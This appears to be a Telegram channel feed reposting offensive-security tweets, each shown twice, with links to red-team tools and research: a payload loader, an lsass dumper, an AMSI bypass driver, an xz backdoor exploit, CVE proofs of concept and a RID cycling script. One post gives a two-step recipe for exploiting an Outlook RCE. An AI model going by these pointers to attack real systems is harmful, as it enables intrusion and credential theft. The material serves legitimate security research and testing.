😈 [ Octoberfest7 @Octoberfest73 ]
This April Fools Day, I'm excited to release my latest research and blog post from my time at @RedSiege: SSHishing. The name might be a joke, but the technique isn't!
Read the details here:
🔗 https://redsiege.com/sshishing
🐥 [ tweet ]
This April Fools Day, I'm excited to release my latest research and blog post from my time at @RedSiege: SSHishing. The name might be a joke, but the technique isn't!
Read the details here:
🔗 https://redsiege.com/sshishing
🐥 [ tweet ]
🤔2
😈 [ Cipher007 @xCipher007 ]
It's my first payload Loader with my learnings from @MalDevAcademy ! Check it out:
🔗 https://github.com/Cipher7/ChaiLdr
🐥 [ tweet ]
It's my first payload Loader with my learnings from @MalDevAcademy ! Check it out:
🔗 https://github.com/Cipher7/ChaiLdr
🐥 [ tweet ]
👍4
😈 [ Alex Plaskett @alexjplaskett ]
A blog on reversing Dark Souls 3 networking by Tim Leonard:
Connection:
🔗 https://timleonard.uk/2022/05/29/reverse-engineering-dark-souls-3-networking
Packets:
🔗 https://timleonard.uk/2022/06/02/reverse-engineering-dark-souls-3-networking-part-2
Key Exchange:
🔗 https://timleonard.uk/2022/06/03/reverse-engineering-dark-souls-3-networking-part-3
Reliable UDP:
🔗 https://timleonard.uk/2022/06/09/reverse-engineering-dark-souls-3-networking-part-4
More:
🔗 https://timleonard.uk/2022/06/18/reverse-engineering-dark-souls-3-networking-part-5
🔗 https://timleonard.uk/2022/06/18/reverse-engineering-dark-souls-3-networking-part-6
🔗 https://timleonard.uk/2022/06/20/reverse-engineering-dark-souls-3-networking-part-7
🐥 [ tweet ]
A blog on reversing Dark Souls 3 networking by Tim Leonard:
Connection:
🔗 https://timleonard.uk/2022/05/29/reverse-engineering-dark-souls-3-networking
Packets:
🔗 https://timleonard.uk/2022/06/02/reverse-engineering-dark-souls-3-networking-part-2
Key Exchange:
🔗 https://timleonard.uk/2022/06/03/reverse-engineering-dark-souls-3-networking-part-3
Reliable UDP:
🔗 https://timleonard.uk/2022/06/09/reverse-engineering-dark-souls-3-networking-part-4
More:
🔗 https://timleonard.uk/2022/06/18/reverse-engineering-dark-souls-3-networking-part-5
🔗 https://timleonard.uk/2022/06/18/reverse-engineering-dark-souls-3-networking-part-6
🔗 https://timleonard.uk/2022/06/20/reverse-engineering-dark-souls-3-networking-part-7
🐥 [ tweet ]
🔥5👍3
😈 [ taha @lordx64 ]
Imagine you are the threat actor behind xz backdoor and you have to explain to your boss why did you spent 6+months building something this complex that a single dude, reversed, documented exploited repurposed honeypoted dockerized in 24hours. This is a W
🔗 https://github.com/amlweems/xzbot
🐥 [ tweet ]
Imagine you are the threat actor behind xz backdoor and you have to explain to your boss why did you spent 6+months building something this complex that a single dude, reversed, documented exploited repurposed honeypoted dockerized in 24hours. This is a W
🔗 https://github.com/amlweems/xzbot
🐥 [ tweet ]
😁12🥱3😢2👍1🔥1
😈 [ Mayfly @M4yFly ]
SCCM Lab write up 📝part 0x3 is out:
🔗 https://mayfly277.github.io/posts/SCCM-LAB-part0x3/
- Exploit as client admin
- Exploit as sccm admin
Find all the articles about the SCCM laboratory exploitation here:
🔗 https://mayfly277.github.io/categories/sccm/
🐥 [ tweet ]
SCCM Lab write up 📝part 0x3 is out:
🔗 https://mayfly277.github.io/posts/SCCM-LAB-part0x3/
- Exploit as client admin
- Exploit as sccm admin
Find all the articles about the SCCM laboratory exploitation here:
🔗 https://mayfly277.github.io/categories/sccm/
🐥 [ tweet ]
👍6
Forwarded from Just Security
Media is too big
VIEW IN TELEGRAM
Судя по всему, статуэтка победителя #pentestaward не только радует глаз, но и пригождается в хозяйстве у наших призеров. Если хотите также, не пропустите анонс нового сезона премии для этичных хакеров!
Уже скоро опубликуем подробности😉
* обязательно со звуком
Уже скоро опубликуем подробности
* обязательно со звуком
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍3🥱3
😈 [ Mark Baggett @MarkBaggett ]
Kerberoasting was discovered more than 8 years ago. But it’s still effective today. Do you know how it works and how it was discovered? Check out @TimMedin of @RedSiege in this episode.
🔗 https://youtu.be/KHkYd81wHTg?si=Hy_sJN_YjQqSnL6J
🐥 [ tweet ]
Kerberoasting was discovered more than 8 years ago. But it’s still effective today. Do you know how it works and how it was discovered? Check out @TimMedin of @RedSiege in this episode.
🔗 https://youtu.be/KHkYd81wHTg?si=Hy_sJN_YjQqSnL6J
🐥 [ tweet ]
🔥4🤯3👍1
😈 [ Mark Baggett @MarkBaggett ]
Do you know the history of Metasploit? How did it grow from a small project to a game changer for Infosec? Check out this episode of Infosec. Toolshed featuring @hdmoore
🔗 https://youtu.be/Dl6qNRCiPgo?si=-zKticbSGYqlL6H7
🐥 [ tweet ]
Do you know the history of Metasploit? How did it grow from a small project to a game changer for Infosec? Check out this episode of Infosec. Toolshed featuring @hdmoore
🔗 https://youtu.be/Dl6qNRCiPgo?si=-zKticbSGYqlL6H7
🐥 [ tweet ]
👍4
😈 [ Ido Veltzman @Idov31 ]
After a long time, the 6th and final part of Lord Of The Ring0 is here:
In this part, the focus will be on kernel mode and user mode memory interaction, look into how attaching process work, and writing an AMSI bypass driver:
🔗 https://idov31.github.io/posts/lord-of-the-ring0-p6
🐥 [ tweet ]
After a long time, the 6th and final part of Lord Of The Ring0 is here:
In this part, the focus will be on kernel mode and user mode memory interaction, look into how attaching process work, and writing an AMSI bypass driver:
🔗 https://idov31.github.io/posts/lord-of-the-ring0-p6
🐥 [ tweet ]
🔥5
😈 [ Diego Capriotti @naksyn ]
One thing I always look for when starting in a network without AD creds is user enumeration with RPC null sessions.
impacket SAMR (samrdump) and LSARPC (lookupsid) tools will give you only a small part of the story. Here's my minimal RID cycling noscript that outplayed everything else, enabling me to find some crackable ASREP-roastable DA accounts hiding with RID > 50000 that were unable to be found using other tools.
I am using chunks to avoid DoS and getting NT_STATUS_INSUFFICIENT_RESOURCES, ofc you can tweak it according to your YOLO level.
there will be a new RPC connection for every chunk, it's a bit better than cycling and using rpcclient every time and always starting RPC connections from scratch. However, RID cycling with rpcclient will generate a ton of STATUS_NO_SUCH_USER responses that are sus, if someone is looking and knows what to look for ofc
🔗 https://gist.github.com/naksyn/8204c76cda2541e72668fa065ba94c09
🐥 [ tweet ]
One thing I always look for when starting in a network without AD creds is user enumeration with RPC null sessions.
impacket SAMR (samrdump) and LSARPC (lookupsid) tools will give you only a small part of the story. Here's my minimal RID cycling noscript that outplayed everything else, enabling me to find some crackable ASREP-roastable DA accounts hiding with RID > 50000 that were unable to be found using other tools.
I am using chunks to avoid DoS and getting NT_STATUS_INSUFFICIENT_RESOURCES, ofc you can tweak it according to your YOLO level.
there will be a new RPC connection for every chunk, it's a bit better than cycling and using rpcclient every time and always starting RPC connections from scratch. However, RID cycling with rpcclient will generate a ton of STATUS_NO_SUCH_USER responses that are sus, if someone is looking and knows what to look for ofc
🔗 https://gist.github.com/naksyn/8204c76cda2541e72668fa065ba94c09
🐥 [ tweet ]
🔥4
😈 [ Ricardo Ruiz @RicardoJoseRF ]
Last week I made public NativeDump, a tool to dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!). Check it out here:
🔗 https://github.com/ricardojoserf/NativeDump
🐥 [ tweet ]
Last week I made public NativeDump, a tool to dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!). Check it out here:
🔗 https://github.com/ricardojoserf/NativeDump
🐥 [ tweet ]
🔥9
😈 [ Filip Dragovic @filip_dragovic ]
I published my PoC for CVE-2023-36047 as MSRC fixed the bypass today tracked as CVE-2024-21447. With some modification can be ported for CVE-2024-21447.
🔗 https://github.com/Wh04m1001/UserManagerEoP
🔗 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36047
🔗 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21447
🐥 [ tweet ]
I published my PoC for CVE-2023-36047 as MSRC fixed the bypass today tracked as CVE-2024-21447. With some modification can be ported for CVE-2024-21447.
🔗 https://github.com/Wh04m1001/UserManagerEoP
🔗 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36047
🔗 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21447
🐥 [ tweet ]
👍4
😈 [ TrustedSec @TrustedSec ]
TAC Practice Lead @mega_spl0it and co-author @4ndr3w6S are back with the final installment of A Hitch-Hacker’s Guide to DACL-Based Detections. Read about the additional attributes they found on our blog!
🔗 https://trustedsec.com/blog/a-hitch-hackers-guide-to-dacl-based-detections-the-addendum
🐥 [ tweet ]
TAC Practice Lead @mega_spl0it and co-author @4ndr3w6S are back with the final installment of A Hitch-Hacker’s Guide to DACL-Based Detections. Read about the additional attributes they found on our blog!
🔗 https://trustedsec.com/blog/a-hitch-hackers-guide-to-dacl-based-detections-the-addendum
🐥 [ tweet ]
🔥3
😈 [ Octoberfest7 @Octoberfest73 ]
I spent the past couple days playing with and contributing to @R0h1rr1m's Shoggoth project, which can turn PE's and BOF's into PIC. Super cool project, and one that opens up some interesting possibilities 😉
🔗 https://github.com/frkngksl/Shoggoth
🐥 [ tweet ]
I spent the past couple days playing with and contributing to @R0h1rr1m's Shoggoth project, which can turn PE's and BOF's into PIC. Super cool project, and one that opens up some interesting possibilities 😉
🔗 https://github.com/frkngksl/Shoggoth
🐥 [ tweet ]
🔥5
Forwarded from PT SWARM
🏭 We've tested the new RCE in Microsoft Outlook (CVE-2024-21378) in a production environment and confirm it works well!
A brief instruction for red teams:
1. Compile our enhanced DLL;
2. Use NetSPI's ruler and wait!
No back connect required!
🔥 📐📏
A brief instruction for red teams:
1. Compile our enhanced DLL;
2. Use NetSPI's ruler and wait!
No back connect required!
🔥 📐📏
🔥5👍4
😈 [ Andy Gill @ZephrFish ]
My latest post on the @Lares_ Labs blog, is live. It discusses a real-world scenario we observed during a pentest.
🔗 https://labs.lares.com/this-one-time-on-a-pentest/
🐥 [ tweet ]
My latest post on the @Lares_ Labs blog, is live. It discusses a real-world scenario we observed during a pentest.
🔗 https://labs.lares.com/this-one-time-on-a-pentest/
🐥 [ tweet ]
🥱1
Freedom F0x
Message
Мануал по почесыванию ЧСВ:
1. Открываешь рандомный гайд по пенетрестам.
2. Идешь в референсы.
3. Считаешь количество матчей по своему никнейму.
4. If > 0: радуешься, забыв на пару секунд о бренности бытия (else: тильтуешь).
1. Открываешь рандомный гайд по пенетрестам.
2. Идешь в референсы.
3. Считаешь количество матчей по своему никнейму.
4. If > 0: радуешься, забыв на пару секунд о бренности бытия (else: тильтуешь).
😁26👍4🥱1
😈 [ Fabio Assolini @assolini ]
XZ backdoor story – Initial analysis
🔗 https://securelist.com/xz-backdoor-story-part-1/112354/
🐥 [ tweet ]
XZ backdoor story – Initial analysis
🔗 https://securelist.com/xz-backdoor-story-part-1/112354/
🐥 [ tweet ]
👍8